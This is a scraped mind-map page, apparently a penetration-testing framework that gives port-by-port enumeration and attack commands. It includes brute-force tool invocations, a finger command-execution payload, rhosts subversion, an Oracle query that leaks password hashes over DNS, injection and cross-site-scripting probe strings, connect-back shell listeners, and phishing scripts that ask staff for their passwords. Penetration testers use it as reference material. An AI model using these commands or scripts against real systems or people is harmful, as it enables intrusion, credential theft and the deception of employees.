Create your own awesome maps

Even on the go

with our free apps for iPhone, iPad and Android

Get Started

Already have an account?
Log In

Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58
5.0 stars - 14 reviews range from 0 to 5

Penetration Testing Framework 0.58


X11 port 6000^ open

X11 Enumeration

List open windows

Authentication Method, Xauth, Xhost

X11 Exploitation

xwd, xwd -display -root -out

Keystrokes, Received, Transmitted


xhost +

Examine Configuration Files


/usr/lib/X11/xdm, Untitled




/usr/lib/X11/xdm/xdm-config, DisplayManager*authorize:on

pwdump [-h][-o][-u][-p] machineName

Nabil contributed the AS/400 section.

Client Side Security

Back end files

.exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

Set objShell = CreateObject("WScript.Shell")

Check visible areas for sensitive information.


txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

Pre-Inspection Visit - template

Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.


Authoratitive Bodies, IANA - Internet Assigned Numbers Authority, ICANN - Internet Corporation for Assigned Names and Numbers., NRO - Number Resource Organisation, RIR - Regional Internet Registry, AFRINIC - African Network Information Centre, APNIC - Asia Pacific Network Information Centre, National Internet Registry, APJII, CNNIC, JPNIC, KRNIC, TWNIC, VNNIC, ARIN - American Registry for Internet Numbers, LACNIC - Latin America & Caribbean Network Information Centre, RIPE - Reseaux IP Européens—Network Coordination Centre

Websites, Central Ops, Domain Dossier, Email Dossier, DNS Stuff, Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries., Fixed Orbit, Autonomous System lookups and other online tools available., Geektools, IP2Location, Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information., Kartoo, Metasearch engine that visually presents its results.,, Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution,, Excellent site that can be used if the above is down,, Netcraft, Online search tool allowing queries for host information., Passive DNS Replication, Finds shared domains based on supplied IP addresses, Note: - Website utilised by nmap hostmap.nse script, Robtex, Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed., Note: - Can be unreliable with old entries (Use CentralOps to verify),, Website listing a large number links to online traceroute resources., Wayback Machine, Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.,

Tools, Cheops-ng, Country whois, Domain Research Tool, Firefox Plugins, AS Number, Shazou, Firecat Suite, Gnetutil, Goolag Scanner, Greenwich, Maltego, GTWhois, Sam Spade, Smart whois, SpiderFoot

Internet Search

General Information, Web Investigator, Tracesmart, Friends Reunited, Ebay - profiles etc.

Financial, EDGAR - Company information, including real-time filings. US, Google Finance - General Finance Portal, Hoovers - Business Intelligence, Insight and Results. US and UK, Companies House UK, Land Registry UK

Phone book/ Electoral Role Information, 123people,,, Electoral Role Search. UK, 411, Online White Pages and Yellow Pages. US, Untitled, Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US, UK, Residential, Business, Pipl, Untitled,,, Spokeo,,, Yasni,, Zabasearch, People Search Engine. US

Generic Web Searching, Code Search, Forum Entries, Google Hacking Database, Google, Email Addresses, Contact Details, Newsgroups/forums, Blog Search, Yammer, Google Blog Search,, Technorati,[query]?language=n, Jaiku,, Twitter Network Browser, Search Engine Comparison/ Aggregator Sites, Clusty,, Grokker,, Zuula,, Exalead, Untitled, Delicious,

Metadata Search, Untitled, MetaData Visualisation Sites, TouchGraph Google Browser, Kartoo, Tools, Bashitsu, svn checkout, cat filename | strings | bashitsu-extract-names, Bintext, Exif Tool, exiftool -common directory, exiftool -r -w .txt -common directory, FOCA, Online Version, Offline, Hachoir, Infocrobes, Libextractor, extract -b filename, extract filename, extract -B country_code filename, Metadata Extraction Tool, extract.bat <arg1> <arg2> <arg3>, Metagoofil, metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to, OOMetaExtractor, The Revisionist, ./therev '' @/directory, ./therev '', ./therev 'linux' en, Wvware, Wikipedia Metadata Search, Wikiscanner, Wikipedia username checker

Social/ Business Networks, Untitled, Africa, BlackPlanet, Australia, Bebo, Belgium, Netlog, Holland, Hyves, Hungary, iWiW, Iran, Cloob, Japan, Mixi, Korea, CyWorld, Poland, Grono, Nasza-klasa, Russia, Odnoklassniki, Vkontakte, Sweden, LunarStorm, UK, FriendsReunited et al, Badoo, FaceParty, US, Classmates, Facebook, Friendster, (formerly, MySpace, Windows Live Spaces, Assorted, Buzznet, Care2, Habbo, Hi5, Linkedin, MocoSpace, Naymz, Orkut, Passado, Tagged, Twitter, Windows Live Spaces, Xanga, Yahoo! 360°, Xing,

Resources, OSINT, International Directory of Search Engines

DNS Record Retrieval from publically available servers

Types of Information Records, SOA Records - Indicates the server that has authority for the domain., MX Records - List of a host’s or domain’s mail exchanger server(s)., NS Records - List of a host’s or domain’s name server(s)., A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS., PTR Records - Lists a host’s domain name, host identified by its IP address., SRV Records - Service location record., HINFO Records - Host information record with CPU type and operating system., TXT Records - Generic text record., CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer., RP - Responsible person for the domain.

Database Settings, Version.bind, Serial, Refresh, Retry, Expiry, Minimum

Sub Domains

Internal IP ranges, Reverse DNS for IP Range

Zone Transfer

Social Engineering

Remote, Phone, Scenarios, IT Department."Hi, it's Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays"If you are calling from a mobile number, explain that the helpdesk has beenissued a mobile phone for 'on call' personnel., Results, Contact Details, Name, Phone number, Email, Room number, Department, Role, Email, Scenarios, Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then populate thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere-established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, Andrew Marks, Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this 'opportunity' to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.Kindest regards,leeEMAIL SIGNATURE, Software, Results, Contact Details, Name, Phone number, Email, Room number, Department, Role, Other

Local, Personas, Name, Suggest same 1st name., Phone, Give work mobile, but remember they have it!, Email, Have a suitable email address, Business Cards, Get cards printed, Contact Details, Name, Phone number, Email, Room number, Department, Role, Scenarios, New IT employee, New IT employee."Hi, I'm the new guy in IT and I've been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don't they? Can you help me out on this?"Get the following information, try to put a "any problems with it we can help with?" slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used software?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure."Thanks very much and you'll see the results on the company boards soon.", Fire Inspector, Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision!, Results, Maps, Satalitte Imagery, Google Maps, Building layouts, Other

Dumpster Diving

Rubbish Bins

Contract Waste Removal

Ebay ex-stock sales i.e. HDD

Web Site copy


teleport pro

Black Widow

Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

Default Port Lists



Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

General Enumeration Tools, nmap, nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml, nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results, nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results, nmap -A -sS -PN -n --script:all ip_address --reason, grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list, netcat, nc -v -n IP_Address port, nc -v -w 2 -z IP_Address port_range/port_number, amap, amap -bqv 80, amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...], xprobe2, xprobe2, sinfp, ./ -i -p, nbtscan, nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>), hping, hping ip_address, scanrand, scanrand ip_address:all, unicornscan, unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E, netenum, netenum network/netmask timeout, fping, fping -a -d hostname/ (Network/Subnet_Mask)

Firewall Specific Tools, firewalk, firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP], ftester, host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

Default Passwords (Examine list), Passwords A, Passwords B, Passwords C, Passwords D, Passwords E, Passwords F, Passwords G, Passwords H, Passwords I, Passwords J, Passwords K, Passwords L, Passwords M, Passwords N, Passwords O, Passwords P, Passwords R, Passwords S, Passwords T, Passwords U, Passwords V, Passwords W, Passwords X, Passwords Y, Passwords Z, Passwords (Numeric)

Active Hosts

Open TCP Ports

Closed TCP Ports

Open UDP Ports

Closed UDP Ports

Service Probing, SMTP Mail Bouncing, Banner Grabbing, Other, HTTP, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, Extensions, WebDAV, ASP.NET, Frontpage, OWA, IIS ISAPI, PHP, OpenSSL, HTTPS, Use stunnel to encapsulate traffic., SMTP, POP3, FTP, If banner altered, attempt anon logon and execute: 'quote help' and 'syst' commands.

ICMP Responses, Type 3 (Port Unreachable), Type 8 (Echo Request), Type 13 (Timestamp Request), Type 15 (Information Request), Type 17 (Subnet Address Mask Request), Responses from broadcast address

Source Port Scans, TCP/UDP 53 (DNS), TCP 20 (FTP Data), TCP 80 (HTTP), TCP/UDP 88 (Kerberos)

Firewall Assessment, Firewalk, TCP/UDP/ICMP responses

OS Fingerprint


Daytime port 13 open

nmap nse script, daytime

FTP port 21 open

Fingerprint server, telnet ip_address 21 (Banner grab), Run command ftp ip_address,, Check for anonymous access, ftp ip_addressUsername: anonymous OR anonPassword:

Password guessing, Hydra brute force, medusa, Brutus

Examine configuration files, ftpusers, ftp.conf, proftpd.conf


SSH port 22 open

Fingerprint server, telnet ip_address 22 (banner grab), scanssh, scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

Password guessing, ssh root@ip_address, guess-who, ./b -l username -h ip_address -p 22 -2 < password_file_location, Hydra brute force, brutessh, Ruby SSH Bruteforcer

Examine configuration files, ssh_config, sshd_config, authorized_keys, ssh_known_hosts, .shosts

SSH Client programs, tunnelier, winsshd, putty, winscp

Telnet port 23 open

Fingerprint server, telnet ip_address, Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster, telnetfp

Password Attack, Untitled, Hydra brute force, Brutus, telnet -l "-froot" hostname (Solaris 10+)

Examine configuration files, /etc/inetd.conf, /etc/xinetd.d/telnet, /etc/xinetd.d/stelnet

Sendmail Port 25 open

Fingerprint server, telnet ip_address 25 (banner grab)

Mail Server Testing, Enumerate users, VRFY username (verifies if username exists - enumeration of accounts), EXPN username (verifies if username is valid - enumeration of accounts), Mail Spoof Test, HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT, Mail Relay Test, Untitled, Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>, Unknown domain - mail from: <user@unknown_domain>, Domain not present - mail from: <user@localhost>, Domain not supplied - mail from: <user>, Untitled, Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>, Untitled, Untitled, Untitled, Untitled

Examine Configuration Files,,

DNS port 53 open

Fingerprint server/ service, host, host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename., nslookup, nslookup [ -option ... ] [ host-to-find | - [ server ]], dig, dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ], whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

DNS Enumeration, Bile Suite, perl [website] [project_name], perl [website] [input file], perl [input file] [true domain file] [output file] <range>, perl [input file] [true domain file] [output file], perl [input file] [output file], perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names], perl [ip_address_file] [output_file], perl jarf-rev [subnetblock] [nameserver], txdns, txdns -rt -t domain_name, txdns -x 50 -bb domain_name, nmap nse scripts, dns-random-srcport, dns-random-txid, dns-recursion, dns-zone-transfer

Examine Configuration Files, host.conf, resolv.conf, named.conf

TFTP port 69 open

TFTP Enumeration, tftp ip_address PUT local_file, tftp ip_address GET conf.txt (or other files), Solarwinds TFTP server, tftp – i <IP> GET /etc/passwd (old Solaris)

TFTP Bruteforcing, TFTP bruteforcer, Cisco-Torch

Finger Port 79 open

User enumeration, finger 'a b c d e f g h', finger, finger, finger, finger, finger **, finger, finger, nmap nse script, finger

Command execution, finger "|/bin/", finger "|/bin/ls -a /"

Finger Bounce, finger user@host@victim, finger @internal@external

Web Ports 80,8080 etc. open

Fingerprint server, Telnet ip_address port, Firefox plugins, All, firecat, Specific, add n edit cookies, asnumber, header spy, live http headers, shazou, web developer

Crawl website, lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source, httprint, Metagoofil, -d [domain] -l [no. of] -f [type] -o results.html

Web Directory enumeration, Nikto, nikto [-h target] [options], DirBuster, Wikto, Goolag Scanner

Vulnerability Assessment, Manual Tests, Default Passwords, Install Backdoors, ASP,, Assorted,,, Perl,,,, PHP,,,, Python,, TCL,, Bash Connect Back Shell, GnuCitizen, Atttack Box: nc -l -p Port -vvv, Untitled, Neohapsis, Atttack Box: nc -l -p Port -vvv, Untitled, Method Testing, nc IP_Adress Port, HEAD / HTTP/1.0, OPTIONS / HTTP/1.0, PROPFIND / HTTP/1.0, TRACE / HTTP/1.1, PUT http://Target_URL/FILE_NAME, POST http://Target_URL/FILE_NAME HTTP/1.x, Upload Files, curl, curl -u <username:password> -T file_to_upload <Target_URL>, curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>,, -h target -r /remote_file_name -f local_file_name, webdav, cadaver, View Page Source, Hidden Values, Developer Remarks, Extraneous Code, Passwords!, Input Validation Checks, NULL or null, Possible error messages returned., ' , " , ; , <!, Breaks an SQL string or query; used for SQL, XPath and XML Injection tests., – , = , + , ", Used to craft SQL Injection queries., ‘ , &, ! , ¦ , < , >, Used to find command execution vulnerabilities., "><script>alert(1)</script>, Basic Cross-Site Scripting Checks., %0d%0a, Carriage Return (%0d) Line Feed (%0a), HTTP Splitting, Untitled, i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>, Cache Poisoning, Untitled, %7f , %ff, byte-length overflows; maximum 7- and 8-bit values., -1, other, Integer and underflow vulnerabilities., %n , %x , %s, Testing for format string vulnerabilities., ../, Directory Traversal Vulnerabilities., % , _, *, Wildcard characters can sometimes present DoS issues or information disclosure., Ax1024+, Overflow vulnerabilities., Automated table and column iteration,, ./,, ./,COLUMN,3+FROM+TABLE--, Vulnerability Scanners, Acunetix, Grendelscan, NStealth, Obiwan III, w3af, Specific Applications/ Server Tools, Domino, dominoaudit, [options] -h <IP>, Joomla, cms_few, ./ <site-name>, joomsq, ./ <IP>, joomlascan, Untitled, joomscan, ./ -u "" -o site.txt -p, jscan, -f hostname, (shell.txt required),, http://target/app/filename.aspx (options i.e. -bf), Vbulletin,, <host> <port> -v, -update, ZyXel,, snmpwalk, snmpwalk -v2c -c public IP_Address, snmpget, snmpget -v2c -c public IP_Address

Proxy Testing, Burpsuite, Crowbar, Interceptor, Paros, Requester Raw, Suru, WebScarab

Examine configuration files, Generic, Examine httpd.conf/ windows config files, JBoss, JMX Console http://<IP>:8080/jmxconcole/, War File, Joomla, configuration.php, diagnostics.php,,, Mambo, configuration.php,, Wordpress, setup-config.php, wp-config.php, ZyXel, /WAN.html (contains PPPoE ISP password), /WLAN_General.html and /WLAN.html (contains WEP key), /rpDyDNS.html (contains DDNS credentials), /Firewall_DefPolicy.html (Firewall), /CF_Keyword.html (Content Filter), /RemMagWWW.html (Remote MGMT), /rpSysAdmin.html (System), /LAN_IP.html (LAN), /NAT_General.html (NAT), /ViewLog.html (Logs), /rpFWUpload.html (Tools), /DiagGeneral.html (Diagnostic), /RemMagSNMP.html (SNMP Passwords), /LAN_ClientList.html (Current DHCP Leases), Config Backups, /RestoreCfg.html, /BackupCfg.html, Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings, ZyXEL Config Reader

Examine web server logs, c:\winnt\system32\Logfiles\W3SVC1, awk -F " " '{print $3,$11} filename | sort | uniq

References, White Papers, Cross Site Request Forgery: An Introduction to a Common Web Application Weakness, Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity, Blind Security Testing - An Evolutionary Approach, Command Injection in XML Signatures and Encryption, Input Validation Cheat Sheet, SQL Injection Cheat Sheet, Books, Hacking Exposed Web 2.0, Hacking Exposed Web Applications, The Web Application Hacker's Handbook

Exploit Frameworks, Brute-force Tools, Acunetix, Metasploit, w3af

Portmapper port 111 open, username:password@IP_Address port/protocol (i.e. 80/HTTP)

rpcinfo, rpcinfo [options] IP_Address

NTP Port 123 open

NTP Enumeration, ntpdc -c monlist IP_ADDRESS, ntpdc -c sysinfo IP_ADDRESS, ntpq, host, hostname, ntpversion, readlist, version

Examine configuration files, ntp.conf

nmap nse script, ntp-info

NetBIOS Ports 135-139,445 open

NetBIOS enumeration, Enum, enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>, Null Session, net use \\\ipc$ "" /u:"", net view \\ip_address, Dumpsec, Smbclient, smbclient -L //server/share password options, Superscan, Enumeration tab., user2sid/sid2user, Winfo

NetBIOS brute force, Hydra, Brutus, Cain & Abel, getacct, NAT (NetBIOS Auditing Tool)

Examine Configuration Files, Smb.conf, lmhosts

SNMP port 161 open

Default Community Strings, public, private, cisco, cable-docsis, ILMI

MIB enumeration, Windows NT, . Hostnames, . Domain Name, . Usernames, . Running Services, . Share Information, Solarwinds MIB walk, Getif, snmpwalk, snmpwalk -v <Version> -c <Community string> <IP>, Snscan, Applications, ZyXel, snmpget -v2c -c <Community String> <IP>, snmpwalk -v2c -c <Community String> <IP>, nmap nse script, snmp-sysdescr

SNMP Bruteforce, onesixtyone, onesixytone -c SNMP.wordlist <IP>, cat, ./cat -h <IP> -w SNMP.wordlist, Solarwinds SNMP Brute Force, ADMsnmp, nmap nse script, snmp-brute

Examine SNMP Configuration files, snmp.conf, snmpd.conf, snmp-config.xml

LDAP Port 389 Open

ldap enumeration, ldapminer, ldapminer -h ip_address -p port (not required if default) -d, luma, Gui based tool, ldp, Gui based tool, openldap, ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...], ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file], ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn], ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file], ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

ldap brute force, bf_ldap, bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,), K0ldS,

Examine Configuration Files, General, containers.ldif, ldap.cfg, ldap.conf, ldap.xml, ldap-config.xml, ldap-realm.xml, slapd.conf, IBM SecureWay V3 server,, Microsoft Active Directory server, msadClassesAttrs.ldif, Netscape Directory Server 4, nsslapd.sas_at.conf, nsslapd.sas_oc.conf, OpenLDAP directory server, slapd.sas_at.conf, slapd.sas_oc.conf, Sun ONE Directory Server 5.1, 75sas.ldif

PPTP/L2TP/VPN port 500/1723 open

Enumeration, ike-scan, ike-probe

Brute-Force, ike-crack

Reference Material, PSK cracking paper, SecurityFocus Infocus, Scanning a VPN Implementation

Modbus port 502 open


rlogin port 513 open

Rlogin Enumeration, Find the files, find / -name .rhosts, locate .rhosts, Examine Files, cat .rhosts, Manual Login, rlogin hostname -l username, rlogin <IP>, Subvert the files, echo ++ > .rhosts

Rlogin Brute force, Hydra

rsh port 514 open

Rsh Enumeration, rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

Rsh Brute Force, rsh-grind, Hydra, medusa

SQL Server Port 1433 1434 open

SQL Enumeration, piggy, SQLPing, sqlping ip_address/hostname, SQLPing2, SQLPing3, SQLpoke, SQL Recon, SQLver

SQL Brute Force, SQLPAT, sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack, sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack, SQL Dict, SQLAT, Hydra, SQLlhf, ForceSQL

Citrix port 1494 open

Citrix Enumeration, Default Domain, Published Applications, ./citrix-pa-scan {IP_address/file | - | random} [timeout], IP_to_proxy_to [Local_IP]

Citrix Brute Force, bforce.js, connect.js, Citrix Brute-forcer, Reference Material, Hacking Citrix - the legitimate backdoor, Hacking Citrix - the forceful way

Oracle Port 1521 Open

Oracle Enumeration, oracsec, Repscan, Sidguess, Scuba, DNS/HTTP Enumeration, SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'') FROM DUAL, Untitled, WinSID, Oracle default password list, TNSVer, tnsver host [port], TCP Scan, Oracle TNSLSNR, Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop], TNSCmd, perl -h ip_address, perl version -h ip_address, perl status -h ip_address, perl -h ip_address --cmdsize (40 - 200), LSNrCheck, Oracle Security Check (needs credentials), OAT, sh -s ip_address, opwg.bat -s ip_address, sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID, OScanner, sh -s ip_address, oscanner.exe -s ip_address, sh oscanner_saved_file.xml, reportviewer.exe oscanner_saved_file.xml, NGS Squirrel for Oracle, Service Register, Service-register.exe ip_address, PLSQL Scanner 2008

Oracle Brute Force, OAK, ora-getsid hostname port sid_dictionary_list, ora-auth-alter-session host port sid username password sql, ora-brutesid host port start, ora-pwdbrute host port sid username password-file, ora-userenum host port sid userlistfile, ora-ver -e (-f -l -a) host port, breakable (Targets Application Server Port), breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose, SQLInjector (Targets Application Server Port), sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL, sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle, Check Password, orabf, orabf [hash]:[username] [options], thc-orakel, Cracker, Client, Crypto, DBVisualisor, Sql scripts from, Manual sql input of previously reported vulnerabilties

Oracle Reference Material, Understanding SQL Injection, SQL Injection walkthrough, SQL Injection by example, Advanced SQL Injection in Oracle databases, Blind SQL Injection, SQL Cheatsheets, Untitled

NFS Port 2049 open

NFS Enumeration, showmount -e hostname/ip_address, mount -t nfs ip_address:/directory_found_exported /local_mount_point

NFS Brute Force, Interact with NFS share and try to add/delete, Exploit and Confuse Unix

Examine Configuration Files, /etc/exports, /etc/lib/nfs/xtab

nmap nse script, nfs-showmount

Compaq/HP Insight Manager Port 2301,2381open

HP Enumeration, Authentication Method, Host OS Authentication, Default Authentication, Default Passwords, Wikto, Nstealth

HP Bruteforce, Hydra, Acunetix

Examine Configuration Files,, mx.log, CLIClientConfig.cfg, database.props, pg_hba.conf, jboss-service.xml, .namazurc

MySQL port 3306 open

Enumeration, nmap -A -n -p3306 <IP Address>, nmap -A -n -PN --script:ALL -p3306 <IP Address>, telnet IP_Address 3306, use test; select * from test;, To check for other DB's -- show databases

Administration, MySQL Network Scanner, MySQL GUI Tools, mysqlshow, mysqlbinlog

Manual Checks, Default usernames and passwords, username: root password:, testing, mysql -h <Hostname> -u root, mysql -h <Hostname> -u root, mysql -h <Hostname> -u root@localhost, mysql -h <Hostname>, mysql -h <Hostname> -u ""@localhost, Configuration Files, Operating System, windows, config.ini, my.ini, windows\my.ini, winnt\my.ini, <InstDir>/mysql/data/, unix, my.cnf, /etc/my.cnf, /etc/mysql/my.cnf, /var/lib/mysql/my.cnf, ~/.my.cnf, /etc/my.cnf, Command History, ~/.mysql.history, Log Files, connections.log, update.log, common.log, To run many sql commands at once -- mysql -u username -p < manycommands.sql, MySQL data directory (Location specified in my.cnf), Parent dir = data directory, mysql, test, information_schema (Key information in MySQL), Complete table list -- select table_schema,table_name from tables;, Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;, File privileges -- select user,file_priv from mysql.user where user='root';, Version -- select version();, Load a specific file -- SELECT LOAD_FILE('FILENAME');, SSL Check, mysql> show variables like 'have_openssl';, If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed., Privilege Escalation, Current Level of access, mysql>select user();, mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';, Access passwords, mysql> use mysql, mysql> select user,password from user;, Create a new user and grant him privileges, mysql>create user test identified by 'test';, mysql> grant 